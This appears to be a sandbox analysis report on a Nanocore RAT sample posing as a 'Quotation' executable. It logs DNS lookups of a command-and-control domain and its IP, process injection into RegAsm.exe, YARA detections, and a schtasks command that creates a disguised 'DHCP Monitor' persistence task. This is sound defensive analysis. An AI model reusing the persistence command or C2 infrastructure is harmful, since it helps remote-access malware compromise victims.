Nov 20, 2020 09:27:26.802903891 CET	61457	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:26.840817928 CET	53	61457	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:28.510669947 CET	58367	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:28.546705008 CET	53	58367	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:33.006752968 CET	60599	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:33.043761969 CET	53	60599	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:33.692368031 CET	59571	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:33.728956938 CET	53	59571	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:33.806638002 CET	52689	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:33.841949940 CET	53	52689	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:34.320183039 CET	50290	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:34.347261906 CET	53	50290	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:34.723608017 CET	60427	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:34.759438038 CET	53	60427	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:35.256510973 CET	56209	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:35.292018890 CET	53	56209	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:35.805032015 CET	59582	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:35.842928886 CET	53	59582	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:36.356888056 CET	60949	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:36.384005070 CET	53	60949	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:36.436245918 CET	58542	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:36.487503052 CET	53	58542	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:37.080786943 CET	59179	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:37.116519928 CET	53	59179	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:37.968655109 CET	60927	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:38.005314112 CET	53	60927	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:38.481499910 CET	57854	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:38.508708954 CET	53	57854	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:39.020487070 CET	62026	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:39.055859089 CET	53	62026	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:42.851494074 CET	59453	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:42.888559103 CET	53	59453	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:44.373290062 CET	62468	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:44.409041882 CET	53	62468	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:50.148700953 CET	52563	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:50.184417963 CET	53	52563	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:55.584182978 CET	54721	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:55.621418953 CET	53	54721	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:00.953408957 CET	62826	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:00.989820004 CET	53	62826	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:06.099515915 CET	62046	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:06.136332989 CET	53	62046	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:11.240219116 CET	51223	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:11.277551889 CET	53	51223	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:12.293785095 CET	63908	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:12.322207928 CET	53	63908	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:13.937680006 CET	49226	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:13.964711905 CET	53	49226	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:16.412998915 CET	60212	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:16.448510885 CET	53	60212	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:21.568610907 CET	58867	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:21.604264975 CET	53	58867	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:26.713026047 CET	50864	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:26.748627901 CET	53	50864	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:34.338577032 CET	61504	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:34.374263048 CET	53	61504	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:39.479101896 CET	60231	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:39.514548063 CET	53	60231	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:44.617322922 CET	50095	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:44.652806997 CET	53	50095	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:49.757090092 CET	59654	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:49.792437077 CET	53	59654	8.8.8.8	192.168.2.7
Nov 20, 2020 09:28:55.054315090 CET	58233	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:28:55.090053082 CET	53	58233	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 09:26:56.079119921 CET	192.168.2.7	8.8.8.8	0xb1c3	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:02.549174070 CET	192.168.2.7	8.8.8.8	0xace9	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:07.688446045 CET	192.168.2.7	8.8.8.8	0xa96a	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:12.862723112 CET	192.168.2.7	8.8.8.8	0x8a48	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:18.017364979 CET	192.168.2.7	8.8.8.8	0xf2e6	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:23.346471071 CET	192.168.2.7	8.8.8.8	0x3e7b	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:28.510669947 CET	192.168.2.7	8.8.8.8	0xe9fa	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:33.692368031 CET	192.168.2.7	8.8.8.8	0x9a6f	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:39.020487070 CET	192.168.2.7	8.8.8.8	0x27e5	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:44.373290062 CET	192.168.2.7	8.8.8.8	0x176c	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:50.148700953 CET	192.168.2.7	8.8.8.8	0xce7	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:55.584182978 CET	192.168.2.7	8.8.8.8	0xa6ad	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:00.953408957 CET	192.168.2.7	8.8.8.8	0x7cd	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:06.099515915 CET	192.168.2.7	8.8.8.8	0xaa79	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:11.240219116 CET	192.168.2.7	8.8.8.8	0xb912	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:16.412998915 CET	192.168.2.7	8.8.8.8	0x8288	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:21.568610907 CET	192.168.2.7	8.8.8.8	0x6bf4	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:26.713026047 CET	192.168.2.7	8.8.8.8	0xb27	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:34.338577032 CET	192.168.2.7	8.8.8.8	0xdca9	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:39.479101896 CET	192.168.2.7	8.8.8.8	0x3bfb	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:44.617322922 CET	192.168.2.7	8.8.8.8	0xe95a	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:49.757090092 CET	192.168.2.7	8.8.8.8	0x85c5	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:55.054315090 CET	192.168.2.7	8.8.8.8	0x6ae4	Standard query (0)	kengeorge.zapto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 20, 2020 09:26:56.116950035 CET	8.8.8.8	192.168.2.7	0xb1c3	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:02.586632013 CET	8.8.8.8	192.168.2.7	0xace9	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:07.723908901 CET	8.8.8.8	192.168.2.7	0xa96a	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:12.900499105 CET	8.8.8.8	192.168.2.7	0x8a48	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:18.044465065 CET	8.8.8.8	192.168.2.7	0xf2e6	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:23.381779909 CET	8.8.8.8	192.168.2.7	0x3e7b	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:28.546705008 CET	8.8.8.8	192.168.2.7	0xe9fa	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:33.728956938 CET	8.8.8.8	192.168.2.7	0x9a6f	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:39.055859089 CET	8.8.8.8	192.168.2.7	0x27e5	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:44.409041882 CET	8.8.8.8	192.168.2.7	0x176c	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:50.184417963 CET	8.8.8.8	192.168.2.7	0xce7	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:27:55.621418953 CET	8.8.8.8	192.168.2.7	0xa6ad	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:00.989820004 CET	8.8.8.8	192.168.2.7	0x7cd	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:06.136332989 CET	8.8.8.8	192.168.2.7	0xaa79	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:11.277551889 CET	8.8.8.8	192.168.2.7	0xb912	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:16.448510885 CET	8.8.8.8	192.168.2.7	0x8288	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:21.604264975 CET	8.8.8.8	192.168.2.7	0x6bf4	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:26.748627901 CET	8.8.8.8	192.168.2.7	0xb27	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:34.374263048 CET	8.8.8.8	192.168.2.7	0xdca9	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:39.514548063 CET	8.8.8.8	192.168.2.7	0x3bfb	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:44.652806997 CET	8.8.8.8	192.168.2.7	0xe95a	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:49.792437077 CET	8.8.8.8	192.168.2.7	0x85c5	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Nov 20, 2020 09:28:55.090053082 CET	8.8.8.8	192.168.2.7	0x6ae4	No error (0)	kengeorge.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 7036 Parent PID: 5720

General

Start time:	09:26:41
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Imagebase:	0x4f0000
File size:	1020416 bytes
MD5 hash:	DDB5D5410477CD3855A1F542112808C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 3392 Parent PID: 7036

General

Start time:	09:26:52
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xd30000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 6248 Parent PID: 7036

General

Start time:	09:26:53
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Imagebase:	0xd00000
File size:	1020416 bytes
MD5 hash:	DDB5D5410477CD3855A1F542112808C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 5816 Parent PID: 3392

General

Start time:	09:26:54
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp'
Imagebase:	0x200000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5824 Parent PID: 5816

General

Start time:	09:26:54
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6200 Parent PID: 1104

General

Start time:	09:26:56
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0
Imagebase:	0xa60000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6396 Parent PID: 6200

General

Start time:	09:26:58
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6e70f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 7160 Parent PID: 6248

General

Start time:	09:27:07
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xa40000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 7036 Parent PID: 5720 Quotation ATB-PR28500KINH.exeCOMMON

Executed Functions

Function 050801CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON

Download Yara Rule

Strings

mbstowcs, xrefs: 05081371, 05081374
tDec, xrefs: 0508075A
dll, xrefs: 050804A8
nt, xrefs: 050812CE
wnDl, xrefs: 0508056C
ls\O, xrefs: 050805B1
File, xrefs: 05080C0F
a, xrefs: 050806EC
roce, xrefs: 05080FEB
w64P, xrefs: 05080FE1
lMem, xrefs: 050807EC
reat, xrefs: 05080DED
Priv, xrefs: 05080DBB
extW, xrefs: 05080696
rtua, xrefs: 05081018
Ex, xrefs: 05081215
RtlC, xrefs: 05080D3E
wnDl, xrefs: 050803F6
\Kno, xrefs: 050804EA
age, xrefs: 05081196
Reso, xrefs: 0508020E
yste, xrefs: 0508028D
wnDl, xrefs: 05080530
Para, xrefs: 05080E0B
tVal, xrefs: 05080BDE
NtSe, xrefs: 05080BD4
Rect, xrefs: 050811C4
indo, xrefs: 05081155
n, xrefs: 05080EB6
ath, xrefs: 05080C79
Regi, xrefs: 0508111E
tCur, xrefs: 05080C51
ombs, xrefs: 05081096
onPr, xrefs: 05080346
odul, xrefs: 05080B20
roce, xrefs: 0508094E
ce, xrefs: 05080246
eryV, xrefs: 05080613
rocA, xrefs: 05080822
KERNEL32.DLL, xrefs: 05081392, 05081398
ash, xrefs: 050806C4
lMem, xrefs: 05081022
just, xrefs: 05080DB1
oces, xrefs: 0508030B
ll, xrefs: 05080F91
hDat, xrefs: 050806E2
oces, xrefs: 05080D84
wPro, xrefs: 0508115F
ext, xrefs: 050807C4
ZwUn, xrefs: 0508099F
wcsc, xrefs: 05080C83
adFi, xrefs: 05080B98
2.dl, xrefs: 0508129D
tual, xrefs: 05080895
ExW, xrefs: 05081114
sW, xrefs: 050808FA
User, xrefs: 0508106E
NtOp, xrefs: 050802F7
Free, xrefs: 050808B8
ileg, xrefs: 05080DC5
tDes, xrefs: 0508077E
irtu, xrefs: 0508097B
adEx, xrefs: 05080D0B
Begi, xrefs: 050811D4
tDes, xrefs: 0508072C
eate, xrefs: 0508122E
eryS, xrefs: 050810B0
ll, xrefs: 050803DD
ser3, xrefs: 05080580
eryS, xrefs: 05080283
NtGe, xrefs: 05080A3B
EndP, xrefs: 050811A0
fSec, xrefs: 050809BD
NtCo, xrefs: 05080D1B
ddre, xrefs: 05080F64
sume, xrefs: 050809E1
CoCr, xrefs: 05081224
teWi, xrefs: 05081100
\ker, xrefs: 0508044F
nPai, xrefs: 050811DE
NtWr, xrefs: 05080967
CoIn, xrefs: 050811F7
eryI, xrefs: 05080328
2.dl, xrefs: 0508041E
NtTe, xrefs: 05080930
orma, xrefs: 050802A1
NtQu, xrefs: 05080B4D
ZwCr, xrefs: 05080E66
NtQu, xrefs: 0508031E
l32., xrefs: 0508054E
NtCr, xrefs: 05080AA9
aint, xrefs: 050811AA
ance, xrefs: 05081242
ings, xrefs: 05080B03
ue, xrefs: 05080D2F
texW, xrefs: 05081360
Crea, xrefs: 050810F6
nel3, xrefs: 05080459
etPr, xrefs: 05080F46
ey, xrefs: 05080713
NtEn, xrefs: 05080631
NtCr, xrefs: 05080BFB
\Kno, xrefs: 05081252
erne, xrefs: 05080544
RtlF, xrefs: 05080C3D
Reso, xrefs: 0508025F
eryI, xrefs: 05080B57
troy, xrefs: 05080788
iteV, xrefs: 05080971
oced, xrefs: 05080F50
ad, xrefs: 050809F5
mp, xrefs: 05080FAA
l, xrefs: 05080594
NtRe, xrefs: 05080B8E
ateH, xrefs: 050806BA
aryA, xrefs: 0508080E
ory, xrefs: 0508102C
alue, xrefs: 0508061D
\Kno, xrefs: 050804B2
ss, xrefs: 05080FF5
eate, xrefs: 05080E70
\adv, xrefs: 0508040A
ls\u, xrefs: 05080576
rPro, xrefs: 05080E4C
ateK, xrefs: 05080645
le, xrefs: 05080BC5
Clas, xrefs: 05081132
Cryp, xrefs: 0508079C
tVir, xrefs: 0508088B
tion, xrefs: 05080CC4
ls32, xrefs: 05080400
ls32, xrefs: 050803BF
NtCl, xrefs: 05081036
Tran, xrefs: 05080E7A
y, xrefs: 05080BF2
NtOp, xrefs: 05080D70
ow, xrefs: 050810E7
Ole3, xrefs: 05081293
reat, xrefs: 05080E38
ls32, xrefs: 05080445
on, xrefs: 050810C4
Hash, xrefs: 05080740
ePro, xrefs: 05080DF7
tDer, xrefs: 050806FF
.dll, xrefs: 05080853
iteF, xrefs: 05080C29
nmen, xrefs: 05080AEF
cess, xrefs: 05080E56
ile, xrefs: 05080C33
eFil, xrefs: 05080B2A
alMe, xrefs: 05080985
\Kno, xrefs: 05080562
Thre, xrefs: 05080A22
rtua, xrefs: 050807E2
mapV, xrefs: 050809A9
wcsc, xrefs: 0508104A
NtSe, xrefs: 05080A04
wnDl, xrefs: 0508043B
Crea, xrefs: 050808DC
ureA, xrefs: 05080F5A
ls\n, xrefs: 050804C6
rtua, xrefs: 050802D9
ory, xrefs: 050807F6
mInf, xrefs: 05080297
oces, xrefs: 05080350
umer, xrefs: 0508063B
RtlZ, xrefs: 05080909
ster, xrefs: 05081128
rThr, xrefs: 05080D5C
enPr, xrefs: 05080D7A
IsWo, xrefs: 05080FD7
ofRe, xrefs: 05080232
Load, xrefs: 05080204
Memo, xrefs: 0508089F
GetM, xrefs: 05080B16
tAcq, xrefs: 05080678
eate, xrefs: 05080C05
W, xrefs: 050801FB
ckTr, xrefs: 05080F15
Quit, xrefs: 05081182
viro, xrefs: 05080AE5
Cryp, xrefs: 05080722
oxA, xrefs: 05080FCD
NtWr, xrefs: 05080C1F
ndEn, xrefs: 05080ADB
ateP, xrefs: 05080944
api3, xrefs: 05080414
r32., xrefs: 0508049E
tion, xrefs: 05080EF1
eeVi, xrefs: 0508100E
wcsl, xrefs: 05080CD4
Cryp, xrefs: 05080774
orma, xrefs: 05080C47
ll.d, xrefs: 050803D3
ansa, xrefs: 05080F1F
s, xrefs: 0508035A
Size, xrefs: 05080228
emor, xrefs: 0508091D
NtQu, xrefs: 05080609
RtlS, xrefs: 05080EBF
nt, xrefs: 050811E8
ss, xrefs: 05080958
NtMa, xrefs: 05080A72
tCon, xrefs: 05080A0E
